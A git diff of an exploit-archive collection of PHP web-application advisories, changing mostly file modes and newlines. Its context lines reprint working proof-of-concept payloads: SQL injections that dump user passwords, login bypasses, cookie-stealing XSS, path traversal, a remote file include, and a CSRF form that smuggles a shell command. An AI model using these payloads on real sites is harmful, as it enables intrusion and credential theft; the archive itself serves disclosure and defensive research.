b/platforms/php/webapps/33477.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin Calendarix 0.7 is vulnerable; other versions may also be affected. -http://www.example.com/cal_config.inc.php?calpath= EVIL SITE??? \ No newline at end of file +http://www.example.com/cal_config.inc.php?calpath= EVIL SITE??? \ No newline at end of file diff --git a/platforms/php/webapps/33478.txt b/platforms/php/webapps/33478.txt old mode 100755 new mode 100644 index f07e562b2..40876dafb --- a/platforms/php/webapps/33478.txt +++ b/platforms/php/webapps/33478.txt @@ -4,4 +4,4 @@ The Jobads component for Joomla! is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/3348.txt b/platforms/php/webapps/3348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33482.txt b/platforms/php/webapps/33482.txt old mode 100755 new mode 100644 index 2a2417375..f0fbaf7e5 --- a/platforms/php/webapps/33482.txt +++ b/platforms/php/webapps/33482.txt @@ -4,4 +4,4 @@ DigitalHive is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/base.php?page=membres.php&mt=[Xss Vuln] \ No newline at end of file +http://www.example.com/base.php?page=membres.php&mt=[Xss Vuln] \ No newline at end of file diff --git a/platforms/php/webapps/33484.txt b/platforms/php/webapps/33484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33485.txt b/platforms/php/webapps/33485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33486.txt b/platforms/php/webapps/33486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33487.txt b/platforms/php/webapps/33487.txt old mode 100755 new mode 100644 index 9bb874ed5..9d3eab72a --- a/platforms/php/webapps/33487.txt +++ b/platforms/php/webapps/33487.txt @@ -6,5 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PhPepperShop 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 - \ No newline at end of file +http://www.example.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971 \ No newline at end of file diff --git a/platforms/php/webapps/33488.txt b/platforms/php/webapps/33488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33505.txt b/platforms/php/webapps/33505.txt old mode 100755 new mode 100644 index f662b59fb..b315f95d6 --- a/platforms/php/webapps/33505.txt +++ b/platforms/php/webapps/33505.txt @@ -8,4 +8,4 @@ Docmint 1.0 is vulnerable; versions 2.1 and higher are also vulnerable; other ve http://www.example.com/index.php?id='"><script>alert(document.cookie)</script> http://www.example.com/index.php?id=<marquee><font color=Red size=16>Th3 RDX/font></marquee> -http://www.example.com/index.php?id=<HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect in corso...</BODY></HTML> \ No newline at end of file +http://www.example.com/index.php?id=<HTML><HEAD><TITLE>Redirect...</TITLE><META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.inj3ct0r.com"></HEAD><BODY>Redirect in corso...</BODY></HTML> \ No newline at end of file diff --git a/platforms/php/webapps/33507.txt b/platforms/php/webapps/33507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33509.txt b/platforms/php/webapps/33509.txt old mode 100755 new mode 100644 index 53ae0b97b..7303e9641 --- a/platforms/php/webapps/33509.txt +++ b/platforms/php/webapps/33509.txt @@ -4,4 +4,4 @@ The Joomla! 'com_artistavenue' component is prone to a cross-site scripting vuln An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?option=com_tienda&task=verproducto&categoria=[XSS] \ No newline at end of file +http://www.example.com/index.php?option=com_tienda&task=verproducto&categoria=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33510.txt b/platforms/php/webapps/33510.txt old mode 100755 new mode 100644 index 00a6a679f..720b214f6 --- a/platforms/php/webapps/33510.txt +++ b/platforms/php/webapps/33510.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The following example URI is available: -http://www.example.com/forum.php?action=liste&cat=[Xss Vuln] \ No newline at end of file +http://www.example.com/forum.php?action=liste&cat=[Xss Vuln] \ No newline at end of file diff --git a/platforms/php/webapps/33514.txt b/platforms/php/webapps/33514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3352.php b/platforms/php/webapps/3352.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33526.txt b/platforms/php/webapps/33526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33528.txt b/platforms/php/webapps/33528.txt old mode 100755 new mode 100644 index d34a84d83..62f5f40cd --- a/platforms/php/webapps/33528.txt +++ b/platforms/php/webapps/33528.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Xforum 1.4; other versions may also be vulnerable. -http://www.example.com/forum/liste.php?categorie=1&nbpage=1&nbpageliste=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +http://www.example.com/forum/liste.php?categorie=1&nbpage=1&nbpageliste=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33529.txt b/platforms/php/webapps/33529.txt old mode 100755 new mode 100644 index 64ade4420..4ffd6b4bf --- a/platforms/php/webapps/33529.txt +++ b/platforms/php/webapps/33529.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects com_marketplace 1.2; other versions may also be affected. -http://www.example.com/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/3353.txt b/platforms/php/webapps/3353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33530.txt b/platforms/php/webapps/33530.txt old mode 100755 new mode 100644 index 72b6b1204..498ac0e96 --- a/platforms/php/webapps/33530.txt +++ b/platforms/php/webapps/33530.txt @@ -7,4 +7,4 @@ Exploiting this issue may allow an attacker to compromise the application and th LetoDMS 1.7.2 is vulnerable; other versions may also be affected. -GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1 \ No newline at end of file +GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/33534.txt b/platforms/php/webapps/33534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3354.txt b/platforms/php/webapps/3354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33541.txt b/platforms/php/webapps/33541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33542.txt b/platforms/php/webapps/33542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33543.txt b/platforms/php/webapps/33543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33544.txt b/platforms/php/webapps/33544.txt old mode 100755 new mode 100644 index dc1297b8e..bcdfdabf8 --- a/platforms/php/webapps/33544.txt +++ b/platforms/php/webapps/33544.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and Datalife Engine 8.3 is vulnerable; other versions may also be affected. -http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com \ No newline at end of file +http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/33545.txt b/platforms/php/webapps/33545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33546.txt b/platforms/php/webapps/33546.txt old mode 100755 new mode 100644 index b395dbe4d..4e7bd8901 --- a/platforms/php/webapps/33546.txt +++ b/platforms/php/webapps/33546.txt @@ -4,4 +4,4 @@ EasySiteNetwork Jokes Complete Website is prone to multiple cross-site scripting An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/Jokes/results.php?searchingred=<img+src=http://www.example.com/cars.jpg+onload=alert(213771818860)> \ No newline at end of file +http://www.example.com/Jokes/results.php?searchingred=<img+src=http://www.example.com/cars.jpg+onload=alert(213771818860)> \ No newline at end of file diff --git a/platforms/php/webapps/3355.php b/platforms/php/webapps/3355.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33550.txt b/platforms/php/webapps/33550.txt old mode 100755 new mode 100644 index cdd75f5cf..0505cc725 --- a/platforms/php/webapps/33550.txt +++ b/platforms/php/webapps/33550.txt @@ -8,4 +8,4 @@ ezContents 2.0.3 is vulnerable; other versions may also be affected. The following example data is available: -login page: admin' AND IF(@Condition,BENCHMARK(1000000, md5(10)),2) OR '1'='1 \ No newline at end of file +login page: admin' AND IF(@Condition,BENCHMARK(1000000, md5(10)),2) OR '1'='1 \ No newline at end of file diff --git a/platforms/php/webapps/33551.txt b/platforms/php/webapps/33551.txt old mode 100755 new mode 100644 index 2d7dec31f..bd1a063ed --- a/platforms/php/webapps/33551.txt +++ b/platforms/php/webapps/33551.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc PHPMySpace Gold 8.0 is vulnerable; other versions may also be affected. -http://www.example.com/modules/arcade/index.php?act=play_game&gid=-1+UNION+SELECT+1,2,3,user(),5%23 \ No newline at end of file +http://www.example.com/modules/arcade/index.php?act=play_game&gid=-1+UNION+SELECT+1,2,3,user(),5%23 \ No newline at end of file diff --git a/platforms/php/webapps/33555.txt b/platforms/php/webapps/33555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33557.txt b/platforms/php/webapps/33557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33558.txt b/platforms/php/webapps/33558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33561.txt b/platforms/php/webapps/33561.txt old mode 100755 new mode 100644 index 43cd54c80..c59ebcb63 --- a/platforms/php/webapps/33561.txt +++ b/platforms/php/webapps/33561.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc OpenX 2.6.1 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?q=shopping/neighborhood/45+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- \ No newline at end of file +http://www.example.com/index.php?q=shopping/neighborhood/45+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- \ No newline at end of file diff --git a/platforms/php/webapps/33566.txt b/platforms/php/webapps/33566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3357.txt b/platforms/php/webapps/3357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33574.txt b/platforms/php/webapps/33574.txt old mode 100755 new mode 100644 index 8045d6908..8bb9752b1 --- a/platforms/php/webapps/33574.txt +++ b/platforms/php/webapps/33574.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Discuz! 6.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal Error</h1></marquee> \ No newline at end of file +http://www.example.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal Error</h1></marquee> \ No newline at end of file diff --git a/platforms/php/webapps/33582.txt b/platforms/php/webapps/33582.txt old mode 100755 new mode 100644 index 35faad773..6b6404abf --- a/platforms/php/webapps/33582.txt +++ b/platforms/php/webapps/33582.txt @@ -4,4 +4,4 @@ The 'com_rsgallery2' component for Joomla! is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_rsgallery2&page=inline&id=5&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_rsgallery2&page=inline&id=5&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/33586.txt b/platforms/php/webapps/33586.txt old mode 100755 new mode 100644 index 1252866b9..0db1aae48 --- a/platforms/php/webapps/33586.txt +++ b/platforms/php/webapps/33586.txt @@ -4,4 +4,4 @@ The 'com_gambling' component for Joomla! is prone to an SQL-injection vulnerabil Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit] \ No newline at end of file +http://www.example.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid=10&gamblingEvent=[Exploit] \ No newline at end of file diff --git a/platforms/php/webapps/33590.txt b/platforms/php/webapps/33590.txt old mode 100755 new mode 100644 index 580804856..f021916f2 --- a/platforms/php/webapps/33590.txt +++ b/platforms/php/webapps/33590.txt @@ -6,4 +6,4 @@ Exploiting the issue may allow an attacker to obtain sensitive information that NOTE: Successful exploitation requires having 'Public Back-end' group credentials. -http://www.example.com/administrator/index.php?option=com_autartitarot&task=edit&cid[]=38&controller=[DT] \ No newline at end of file +http://www.example.com/administrator/index.php?option=com_autartitarot&task=edit&cid[]=38&controller=[DT] \ No newline at end of file diff --git a/platforms/php/webapps/33595.txt b/platforms/php/webapps/33595.txt old mode 100755 new mode 100644 index 68c7292a6..7cd4854f3 --- a/platforms/php/webapps/33595.txt +++ b/platforms/php/webapps/33595.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to obtain sensitive information, Interspire Knowledge Manager 5.1.3 and prior versions are vulnerable. -http://www.example.com/admin/de/colormenu.php?sp=f";[xss];a=" \ No newline at end of file +http://www.example.com/admin/de/colormenu.php?sp=f";[xss];a=" \ No newline at end of file diff --git a/platforms/php/webapps/33597.txt b/platforms/php/webapps/33597.txt old mode 100755 new mode 100644 index 53882ec6b..7d346f5f4 --- a/platforms/php/webapps/33597.txt +++ b/platforms/php/webapps/33597.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Data 1 Systems UltraBB 1.17 is vulnerable; other versions may also be affected. -http://www.example.com/view_post.php?post_id==">><script></script><marquee><h1>XSS By Fatal Error</h1></marquee> \ No newline at end of file +http://www.example.com/view_post.php?post_id==">><script></script><marquee><h1>XSS By Fatal Error</h1></marquee> \ No newline at end of file diff --git a/platforms/php/webapps/3360.txt b/platforms/php/webapps/3360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33602.txt b/platforms/php/webapps/33602.txt old mode 100755 new mode 100644 index 7bcdb8d0d..3ac152911 --- a/platforms/php/webapps/33602.txt +++ b/platforms/php/webapps/33602.txt @@ -8,4 +8,4 @@ Versions prior to evalSMSI 2.2.00 are vulnerable. http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 -http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 \ No newline at end of file +http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22 \ No newline at end of file diff --git a/platforms/php/webapps/33603.html b/platforms/php/webapps/33603.html old mode 100755 new mode 100644 index d830b895d..03843b1ad --- a/platforms/php/webapps/33603.html +++ b/platforms/php/webapps/33603.html @@ -6,4 +6,4 @@ An attacker can exploit the cross-site request forgery issue to alter the settin The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. -<html> <head><title>LANDesk PoC</title></head> <body> <form method="post" action="https://www.example.com/gsb/datetime.php"> <input type="text" name="delBackupName" value="; touch /tmp/ATTACKED"> <input type="text" name="backupRestoreFormSubmitted" value="b"> <input type="submit" value="Attack!"> </form> </body> </html> \ No newline at end of file +<html> <head><title>LANDesk PoC</title></head> <body> <form method="post" action="https://www.example.com/gsb/datetime.php"> <input type="text" name="delBackupName" value="; touch /tmp/ATTACKED"> <input type="text" name="backupRestoreFormSubmitted" value="b"> <input type="submit" value="Attack!"> </form> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/33605.php b/platforms/php/webapps/33605.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33606.txt b/platforms/php/webapps/33606.txt old mode 100755 new mode 100644 index 9d1d6ad09..401248034 --- a/platforms/php/webapps/33606.txt +++ b/platforms/php/webapps/33606.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a http://www.example.com/?_action=editProducts&categoryID=[SQLI] http://www.example.com/?_action=showProducts&categoryID=[SQLI]&id=shop http://www.example.com/?_action=showProductDetails&productID=[SQLI]&categoryID=1310&id=shop -http://www.example.com/?_action=showProductDetails&productID=22095&categoryID=[SQLI]&id=shop \ No newline at end of file +http://www.example.com/?_action=showProductDetails&productID=22095&categoryID=[SQLI]&id=shop \ No newline at end of file diff --git a/platforms/php/webapps/3361.txt b/platforms/php/webapps/3361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33613.txt b/platforms/php/webapps/33613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33617.txt b/platforms/php/webapps/33617.txt old mode 100755 new mode 100644 index 342bb4882..9f57ef302 --- a/platforms/php/webapps/33617.txt +++ b/platforms/php/webapps/33617.txt @@ -11,4 +11,4 @@ The following proof of concept is available: http://www.example.com/admincp username = 'or 33=33/* -Password = Security War \ No newline at end of file +Password = Security War \ No newline at end of file diff --git a/platforms/php/webapps/33618.txt b/platforms/php/webapps/33618.txt old mode 100755 new mode 100644 index 7d8e77af9..01dce7947 --- a/platforms/php/webapps/33618.txt +++ b/platforms/php/webapps/33618.txt @@ -9,4 +9,4 @@ Zen Time Tracking 2.2 is vulnerable; other versions may also be affected. [ZenTracking_path]/managerlogin.php username: ' or' 1=1 -Password: ' or' 1=1 \ No newline at end of file +Password: ' or' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/33619.txt b/platforms/php/webapps/33619.txt old mode 100755 new mode 100644 index c1824d3a5..ff6c74e28 --- a/platforms/php/webapps/33619.txt +++ b/platforms/php/webapps/33619.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow VideoDB 3.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/videodb/login.php?error=%3Cscript%3Ealert%20%28%27XSS%27%29%3C/script%3E \ No newline at end of file +http://www.example.com/videodb/login.php?error=%3Cscript%3Ealert%20%28%27XSS%27%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33621.txt b/platforms/php/webapps/33621.txt old mode 100755 new mode 100644 index 628999478..8574bf50b --- a/platforms/php/webapps/33621.txt +++ b/platforms/php/webapps/33621.txt @@ -4,4 +4,4 @@ The vBulletin Adsense component is prone to an SQL-injection vulnerability becau Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/vb/viewpage.php?do=show&id=-1%20union%20select%200,2,3-- \ No newline at end of file +http://www.example.com/vb/viewpage.php?do=show&id=-1%20union%20select%200,2,3-- \ No newline at end of file diff --git a/platforms/php/webapps/33624.txt b/platforms/php/webapps/33624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33626.txt b/platforms/php/webapps/33626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33634.txt b/platforms/php/webapps/33634.txt old mode 100755 new mode 100644 index 3efc96744..9d505107f --- a/platforms/php/webapps/33634.txt +++ b/platforms/php/webapps/33634.txt @@ -4,4 +4,4 @@ CommodityRentals CD Rental Software is prone to an SQL-injection vulnerability b Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0Ã?3a,admin_password),3,4+from+rental_adminâ?? \ No newline at end of file +http://www.example.com/index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0Ã?3a,admin_password),3,4+from+rental_adminâ?? \ No newline at end of file diff --git a/platforms/php/webapps/33636.sh b/platforms/php/webapps/33636.sh index 8f621bcec..8fe1bc7e3 100755 --- a/platforms/php/webapps/33636.sh +++ b/platforms/php/webapps/33636.sh @@ -25,4 +25,4 @@ http://source # echo "upload content from: $4 ..." # wget -O r3 --keep-session-cookies --load-cookies tmp.cookies "$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4" -# echo "file created test access to the script at: $1/admin/de/dialog/$2$3"; \ No newline at end of file +# echo "file created test access to the script at: $1/admin/de/dialog/$2$3"; \ No newline at end of file diff --git a/platforms/php/webapps/33637.txt b/platforms/php/webapps/33637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33638.txt b/platforms/php/webapps/33638.txt old mode 100755 new mode 100644 index 624d961c8..2cb41805c --- a/platforms/php/webapps/33638.txt +++ b/platforms/php/webapps/33638.txt @@ -10,4 +10,4 @@ Webee 1.1.1 is vulnerable to all these issues. Webee 1.2 is reportedly affected [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color] [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img] -[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url] \ No newline at end of file +[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url] \ No newline at end of file diff --git a/platforms/php/webapps/33639.txt b/platforms/php/webapps/33639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33641.txt b/platforms/php/webapps/33641.txt old mode 100755 new mode 100644 index 3cd406a39..33ea479c2 --- a/platforms/php/webapps/33641.txt +++ b/platforms/php/webapps/33641.txt @@ -10,4 +10,4 @@ F!BB 1.96 is vulnerable; other versions may also be affected. The following proof-of-concept URI and data are available: -http://www.example.com/index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- \ No newline at end of file +http://www.example.com/index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- \ No newline at end of file diff --git a/platforms/php/webapps/33643.txt b/platforms/php/webapps/33643.txt old mode 100755 new mode 100644 index b8cef0177..623d9b644 --- a/platforms/php/webapps/33643.txt +++ b/platforms/php/webapps/33643.txt @@ -9,4 +9,4 @@ The attacker may leverage the cross-site scripting issue to execute arbitrary sc CMS Made Simple 1.6.6 is affected; other versions may also be vulnerable. http://www.example.com/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script> -http://www.example.com/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39 \ No newline at end of file +http://www.example.com/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39 \ No newline at end of file diff --git a/platforms/php/webapps/33644.txt b/platforms/php/webapps/33644.txt old mode 100755 new mode 100644 index 42e133201..940deb83d --- a/platforms/php/webapps/33644.txt +++ b/platforms/php/webapps/33644.txt @@ -4,4 +4,4 @@ Basic-CMS is prone to a cross-site scripting vulnerability because it fails to p An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +http://www.example.com/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/33646.txt b/platforms/php/webapps/33646.txt old mode 100755 new mode 100644 index 7780fc336..847fd184e --- a/platforms/php/webapps/33646.txt +++ b/platforms/php/webapps/33646.txt @@ -10,4 +10,4 @@ The following example commands are available: " onmouseover="alert(String.fromCharCode(88,83,83)) -" style="color:expression(alert(String.fromCharCode(88,83,83))) \ No newline at end of file +" style="color:expression(alert(String.fromCharCode(88,83,83))) \ No newline at end of file diff --git a/platforms/php/webapps/33649.txt b/platforms/php/webapps/33649.txt old mode 100755 new mode 100644 index 01eeeaa80..812323747 --- a/platforms/php/webapps/33649.txt +++ b/platforms/php/webapps/33649.txt @@ -4,4 +4,4 @@ BGSvetionik BGS CMS is prone to a cross-site scripting vulnerability because it An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/?action=search&search=[XSS] \ No newline at end of file +http://www.example.com/?action=search&search=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3365.txt b/platforms/php/webapps/3365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33650.txt b/platforms/php/webapps/33650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33651.txt b/platforms/php/webapps/33651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33652.txt b/platforms/php/webapps/33652.txt old mode 100755 new mode 100644 index 8bf6407a5..f3e50422c --- a/platforms/php/webapps/33652.txt +++ b/platforms/php/webapps/33652.txt @@ -11,4 +11,4 @@ New-CMS 1.08 is vulnerable; other versions may also be affected. http://www.example.com/pdf.php?lng=cmd.php http://www.example.com/newcms/struttura/manager.php?lng=cmd.php -http://www.example.com/newcms/struttura/editor/quote.php?lng=cmd.php \ No newline at end of file +http://www.example.com/newcms/struttura/editor/quote.php?lng=cmd.php \ No newline at end of file diff --git a/platforms/php/webapps/33656.txt b/platforms/php/webapps/33656.txt old mode 100755 new mode 100644 index 8940a7d86..698fc3d99 --- a/platforms/php/webapps/33656.txt +++ b/platforms/php/webapps/33656.txt @@ -8,4 +8,4 @@ SphereCMS 1.1 Alpha is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/archive.php?view=*** \ No newline at end of file +http://www.example.com/archive.php?view=*** \ No newline at end of file diff --git a/platforms/php/webapps/33657.txt b/platforms/php/webapps/33657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33658.txt b/platforms/php/webapps/33658.txt old mode 100755 new mode 100644 index b5cc0542e..834390b20 --- a/platforms/php/webapps/33658.txt +++ b/platforms/php/webapps/33658.txt @@ -8,4 +8,4 @@ Social Web CMS Beta 2 is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/index.php?category=%22%3E[XSS] \ No newline at end of file +http://www.example.com/index.php?category=%22%3E[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33659.txt b/platforms/php/webapps/33659.txt old mode 100755 new mode 100644 index b5b773b0a..58475d029 --- a/platforms/php/webapps/33659.txt +++ b/platforms/php/webapps/33659.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a http://www.example.com/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1] http://www.example.com/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2] -http://www.example.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3] \ No newline at end of file +http://www.example.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3] \ No newline at end of file diff --git a/platforms/php/webapps/3366.txt b/platforms/php/webapps/3366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33660.txt b/platforms/php/webapps/33660.txt old mode 100755 new mode 100644 index 23b1810f1..68babdd69 --- a/platforms/php/webapps/33660.txt +++ b/platforms/php/webapps/33660.txt @@ -26,4 +26,4 @@ 